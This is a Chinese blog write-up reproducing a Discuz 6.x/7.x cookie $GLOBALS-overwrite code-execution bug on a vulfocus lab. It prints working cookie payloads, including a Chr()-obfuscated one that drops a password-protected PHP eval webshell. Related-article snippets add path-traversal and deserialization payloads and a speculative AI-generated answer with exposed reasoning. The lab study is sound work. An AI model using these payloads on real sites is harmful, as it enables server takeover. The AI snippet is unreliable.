【漏洞复现-discuz-wooyun-命令执行】vulfocus/discuz-wooyun_2010_080723

原创 已于 2023-01-06 15:27:51 修改 · 1.4k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2022-10-14 12:50:13 首次发布
本文介绍了一个利用PHP中的$GLOBALS变量覆盖漏洞实现远程代码执行的过程。通过在Cookie中传递特殊构造的$GLOBALS值,可以触发命令执行,包括展示phpinfo信息及写入webshell。详细展示了POC的构造方法。

  

前言:

介绍: 

博主:网络安全领域狂热爱好者(承诺在优快云永久无偿分享文章)。

殊荣:优快云网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。

擅长:对于技术、工具、漏洞原理、黑产打击的研究。

C站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、迷茫期。

导读:

面向读者:对于网络安全方面的学者。 

本文知识点(读者自测): 

(1)检索隐藏数据(√)

 让读者如虎添翼

命令、代码执行博文目标状态
【漏洞复现-jupyter_notebook-命令执行】vulfocus/jupyter_notebook-cve_2019_9644发现功能点上的命令执行已发布
【漏洞复现-solr-命令执行】vulfocus/solr-cve_2019_17558寻找模板(接口、配置文件)的命令执行漏洞已发布
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721写入可执行文件已发布
【漏洞复现-maccms-命令执行】vulfocus/maccms-cve_2017_17733参数中写入命令(加密)已发布
【漏洞复现-webmin-命令执行】vulfocus/webmin-cve_2019_15107拼接执行命令已发布
【漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x写入错误日志中已发布
【漏洞复现-Discuz-代码执行】Discuz_CVE-2019-13956cookie中植入已发布
【漏洞复现-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339后台配置中植入命令已发布
【漏洞复现-thinkphp-代码执行】vulfocus/thinkphp-cve_2018_1002015thinkphp命令执行已发布
【漏洞复现-discuz-wooyun-命令执行】vulfocus/discuz-wooyun_2010_080723cookie中命令执行已发布
更多复现漏洞将公布,敬请期待————

目录

一、靶场环境

1.1、平台:

1.2、知识:

1.3、描述:

二、漏洞验证

2.1、分析:

2.4、解题:

一、靶场环境

1.1、平台:

【漏洞复现-discuz-wooyun-命令执行】vulfocus/discuz-wooyun_2010_080723

123.58.224.8:22709

123.58.224.8:26641

123.58.224.8:26641

1.2、知识:

1、命令执行

PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当能控制这些函数中的参数时,就可将恶意系统命令拼接到正常命令中,从而造成命令执行攻击

2、$GLOBALS

引用全局作用域中可用的全部变量

关联数组 array,包含当前脚本内定义成全局范围的所有变量的引用。 数组的键就是变量的名字。

3、chr()码值表

返回值是当前整数对应的 ASCII 字符

1.3、描述:

由于php版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞

二、漏洞验证

2.1、分析:

点击默认模板进入

 随便点击一个通知(这里都是管理员发布的)

phpinfo的POC

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

 

写入shell的POC

x.php密码pwd

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59));

 

 

2.4、解题:

网络安全三年之约

First year 

掌握各种原理、不断打新的靶场

目标:edusrc、cnvd 

主页 | 教育漏洞报告平台 (sjtu.edu.cn)https://src.sjtu.edu.cn/https://www.cnvd.org.cnhttps://www.cnvd.org.cn/

second year 

不断学习、提升技术运用技巧,研究各种新平台

开始建立自己的渗透体系

目标:众测平台、企业src应急响应中心 

众测平台URL
漏洞盒子漏洞盒子 | 互联网安全测试众测平台
火线安全平台火线安全平台
漏洞银行BUGBANK 官方网站 | 领先的网络安全漏洞发现品牌 | 开放安全的提出者与倡导者 | 创新的漏洞发现平台
360漏洞众包响应平台360漏洞云漏洞众包响应平台
补天平台(奇安信)补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC
春秋云测首页
雷神众测(可信众测,安恒)雷神众测 - BountyTeam
云众可信(启明星辰)云众可信 - 互联网安全服务引领者
ALLSECALLSEC
360众测360众测平台
看雪众测(物联网)https://ce.kanxue.com/
CNVD众测平台网络安全众测平台
工控互联网安全测试平台CNCERT工业互联网安全测试平台
慢雾(区块链)Submit Bug Bounty - SlowMist Zone - Blockchain Ecosystem Security Zone
平安汇聚http://isrc.pingan.com/homePage/index

互联网大厂URL
阿里https://asrc.alibaba.com/#/
腾讯https://security.tencent.com/
百度https://bsrc.baidu.com/v2/#/home
美团https://security.meituan.com/#/home
360https://security.360.cn/
网易https://aq.163.com/
字节跳动https://security.bytedance.com/
京东https://security.jd.com/#/
新浪http://sec.sina.com.cn/
微博https://wsrc.weibo.com/
搜狗http://sec.sogou.com/
金山办公https://security.wps.cn/
有赞https://src.youzan.com/

Third Year 

学习最新的知识,建全自己的渗透体系

目标:参与护网(每一个男孩子心中的梦想) 

时间:一般5月面试,6/7月开始(持续2-3周)

分类:国家级护网、省级护网、市级护网、重大节日护网(如:建党、冬奥等)

Vulhub靶场Discuz-命令执行(wooyun-2010-080723)漏洞复现
X_python321的博客
05-16 709
Discuz-命令执行(wooyun-2010-080723)漏洞复现
buuctf [Discuz]wooyun-2010-080723
qq_1873822的博客
03-23 1787
漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 https://www.secpulse.com/archives/2338.html https://www.freebuf.com/articles/web/226207.html 漏洞复现 http://node3.buuoj.cn:28226/install/来安装di
discuz wooyun-2010-080723
weixin_37639863的博客
02-17 2084
漏洞复现-Discuz-命令执行wooyun-2010-080723) - 铺哩 - 博客园0x00 实验环境 攻击机:win10 靶机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 Discuz 7.x 6.x版本 0x02 实验目的 学习discuz的部分https://www.cnblogs.com/cute-puli/p/13333991.htmlbuuctf [Discuz]wooyun-2010-080723_Fatesec的博客-优快云博客漏洞描述由于php
vulfocus——discuz命令执行(wooyun-2010-080723
m0_62063669的博客
09-15 1759
如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。2.找到一个帖子,然后用burp suite抓包。
【vulhub】Discuz-命令执行 wooyun-2010-080723
weixin_42884199的博客
12-06 2116
一、启动靶机 docker-compose build docker-compose up -d 二、安装 URL: http://192.168.150.146:8080/install 安装数据库。数据库服务器填写db(必须db,不然安装失败),数据库名为discuz,数据库账号密码均为root,管理员密码任意。填写联系方式页面直接点击跳过本步后跳转到首页,登录成功后进入默认板块,开启Burp抓包,然后随便点击一篇贴子 将Cookie修改为下面,点击放包 三、构造payload 请求: GET
Discuz!X ≤3.4 任意文件删除漏洞wooyun-2014-065513)
黑白的博客
12-06 1290
声明 好好学习,天天向上 漏洞描述 Discuz!X社区软件是一个采用PHP 和MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。 2017年9月29日,Discuz!修复了一个安全问题2用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。 2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇404实验室分析确认,该漏洞于2014年6月被提交到Wooyun漏洞平台,Seebug漏洞平台收录了该漏洞3,漏洞编号ssvid-93588。该漏洞通过配置属性值,
ThinkCMF+Dedecms+discuz漏洞复现
热门推荐
1ance's blog
11-13 4万+
写在前面:本文为网上下载的cms搭建的靶场环境,内含thinkCMF+dedecms+discuz!;通过对靶场的测试,对cms的漏洞进行复现。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录0x001 环境搭建0x002 漏洞复现0x01 弱口令0x02 任意文件上传0x03 头像上传处存在任意文件删除漏洞0x04 任意文件包含漏洞0x05 后台存在SQL注入0x06 URL重定向0x07 远程代码执行0x08 任意文件上传0x09 存储型XSS0x10 远程代码执行0x11 个人资料处存在存储型
Discuz漏洞复现
小小猪的博客
11-30 7599
Discuz漏洞复现 漏洞描述: Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限。 漏洞影响版本: Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org (注意:支持多语言切换可能会有这个漏洞!) 环境搭建: 这里用安鸾渗透测试实战平台环境 :地址 这里访问robots.txt,发现下面有很多路径,访问之
漏洞复现-Discuz-代码执行】Discuz_CVE-2019-13956
10-13 2808
Discuz-代码执行】可控,包含
漏洞复现-DiscuzX ≤3.4 任意文件删除漏洞
qq_59350385的博客
05-10 1118
一、环境搭建 本次用的是vulhub靶场 执行下列命令部署 Discuz!X 安装环境 docker-compose up -d 安装时,只用修改数据库地址为`db`,其他保持默认即可: 二、漏洞复现 (1)访问`http://your-ip/robots.txt`可见robots.txt是存在的: (2)注册用户hahaha (3)在个人设置页面找到自己的formhash (4)带上自己的Cookie、formhash发送如下数据包 (5)查看个人设置页面的出生地
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
haha1314的博客
07-15 1074
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞漏洞复现 安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][sm...
vulhub靶场漏洞复现——Discuz
pigzlfa的博客
09-21 809
Board(简称 Discuz!,中国国家版权局著作权登记号 2006SR11895)是北京康盛新创科技有限责任公司推出的一套通用的社区建站系统,站长可以不需要任何编程基础,通过简单的安装和设置,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的网站。Discuz!的基础架构采用世界上最流行的web编程组合PHP+MySQL实现,是一个经过完善设计,适用于各种服务器环境的高效建站解决方案。
Discuz 7.x6.x 全局变量防御绕过导致代码执行(wooyun-2010-080723
黑白的博客
12-06 645
声明 好好学习,天天向上 漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 影响范围 6.x 7.x 复现过程 使用vulhub 这里使用7.2版本 cd /app/vulhub-master/discuz/wooyun-2010-080723 启动 docker-compose
discuz安装_Discuz! ml RCE漏洞复现(自写EXP分享)
weixin_39946300的博客
12-28 1050
# 000 前言大家好我是PANDA墨森,昨天公众号粉丝涨了一大波,首先感谢一下圈子社区的大力分享,也祝愿圈子社区能越办越好!今天的文章还是老样子,漏洞复现+自写EXP分享,脚本有需要的后台留言,也可以自行更改,话不多说,往下看#001 Discuz!ml简介:Discuz!ml是一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善...
那些年 WooYun漏洞
weixin_30535565的博客
06-07 349
Type: 任意文件读取 ../../../../../../../../../../etc/passwd%00 /etc/sysconfig/network ../../../foo/../../../../etc/passwd //nodejs SQL注入 and 1=2 union select 1,2,version(),3%23 blind sqli error sqli 宽字节注...
Discuz远程代码执行(CVE-2019-13956)
qq_51459600的博客
05-04 2138
Discuz! ML远程代码执行(CVE-2019-13956) 漏洞介绍: 该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。 环境搭建: 靶机:CentOS7(10.10.10.137) docker环境下载: https://codeload.github.com/rhbb/CVE-2019-13956/zip/refs/heads/master 进入目录: docker-compuse up -d docker ps -a
DiscuzX系列命令执行分析公开(三连弹)
weixin_34242331的博客
03-08 737
tang3 · 2015/01/15 18:550x00 漏洞概要昨天360补天发了这样的一条微博:然后打听了一下细节,发现居然是我13年7月报给TSRC的漏洞,看今天大家玩的挺开心,与TSRC的人聊了两句,说这个系列可以发几个了,所以我也来凑个热闹,把原来的分析发出来给大家看一下(这里做个广告,TSRC提交Discuz漏洞,奖品棒棒哒~~)。这个漏洞原来我是作为前台命令执行发个TSRC的,虽然...
nc 探测端口_Discuz-3.1 ssrf漏洞利用操作(环境搭建、漏洞复现、探测端口)
weixin_39569051的博客
01-09 636
一、环境搭建:(一)Phpstudy+win7搭建discuz漏洞环境(二)把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可(三)安装完成访问一波:二、漏洞复现:(一) Centos7,临时关闭防火墙(二)开启nc监听6666端口:nc -lvp 6666(三)查看centos7的ip(四)利用discuz漏洞向centos7发起一个请求:http://...
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 6308
Discuz v3.4系列 远程代码执行漏洞全流程详解
wooyun-2015-148227漏洞
最新发布
11-14
<think> 嗯,用户查询的是wooyun-2015-148227漏洞的详细信息。用户提供的引用内容涉及其他漏洞(如Elasticsearch写入webshell和phpmyadmin反序列化),但未直接提及目标漏洞编号。 我注意到用户引用的几个漏洞中有类似模式,如WooYun-2015-110216(Elasticsearch漏洞)和WooYun-2016-199433(phpmyadmin漏洞),但148227完全不在引用中。考虑到WooYun漏洞编号的连续性,148227应该属于2015年公开的中高危漏洞。 从现有线索推测可能的漏洞方向: - 时间特征:2015年披露,与引用中Elasticsearch漏洞同期 - 编号间隔:148227与110216相差约3.8万个编号,可能属于不同产品 - 常见类型:2015年主流漏洞集中在反序列化、路径遍历、权限绕过 用户可能实际需求是: 1 企业安全人员复现历史漏洞 2 学生研究经典漏洞原理 3 红队人员寻找攻击向量 需要明确告知信息缺失,同时提供替代方案: ✓ 确认无直接引用 ✓ 建议权威平台验证 ✓ 关联相似漏洞案例 ✓ 提供漏洞库搜索方法 特别注意避免混淆编号相近的漏洞(如148227 vs 110216),在回复中严格区分引用内容和新增建议。 </think>根据现有资料分析,未在提供的引用中找到 **WooYun-2015-148227** 漏洞的直接信息。基于漏洞编号特征(2015年披露)和常见漏洞类型,以下是合理推测和排查建议: --- ### 漏洞可能性分析 1. **典型漏洞类型** WooYun-2015 系列漏洞多涉及: - Web 应用漏洞(如 PHP 反序列化、文件包含) - 中间件漏洞(如 Elasticsearch、Tomcat) - 权限绕过或目录遍历(如引用 [^2][^4] 的路径操作漏洞) 2. **潜在关联方向** 参考同类编号漏洞- **WooYun-2015-110216**:Elasticsearch 备份仓库路径权限缺陷导致 Webshell 写入(引用 [^1][^3][^4]) $$ \text{漏洞原理:未限制备份路径} \rightarrow \text{恶意索引覆盖 Web 目录} $$ - **WooYun-2016-199433**:phpMyAdmin 反序列化漏洞(引用 [^2]) --- ### 排查建议 1. **权威漏洞库验证** 通过以下平台精准查询: - **Exploit-DB**:`searchsploit WooYun-2015-148227` - **NVD NIST**:`https://nvd.nist.gov/vuln/search` - **WooYun 历史镜像站**:如 `wooyun.x10sec.org` 2. **模糊匹配可能性** 若漏洞属于以下类型,可扩大范围排查: - **目录遍历**:类似引用 [^4] 的路径操作漏洞 ```http GET /../../path/to/shell.jsp HTTP/1.1 ``` - **反序列化漏洞**:参考引用 [^2] 的 phpMyAdmin 利用格式 ```php configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} ``` 3. **漏洞复现环境** 尝试在 Vulhub/VulnApps 中搜索编号: ```bash grep -r "WooYun-2015-148227" /vulhub/ ``` --- ### 注意事项 1. **历史漏洞局限性** WooYun 关闭后部分漏洞仅存概要,需结合第三方存档(如 [WooYun 漏洞镜像库](http://wooyun.zone/))补全细节。 2. **风险提示** 若涉及未公开漏洞,需通过合法授权途径获取(如 CVE 披露流程)。 建议通过上述途径进一步验证,如需协助分析漏洞类型特征,可提供更多线索。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值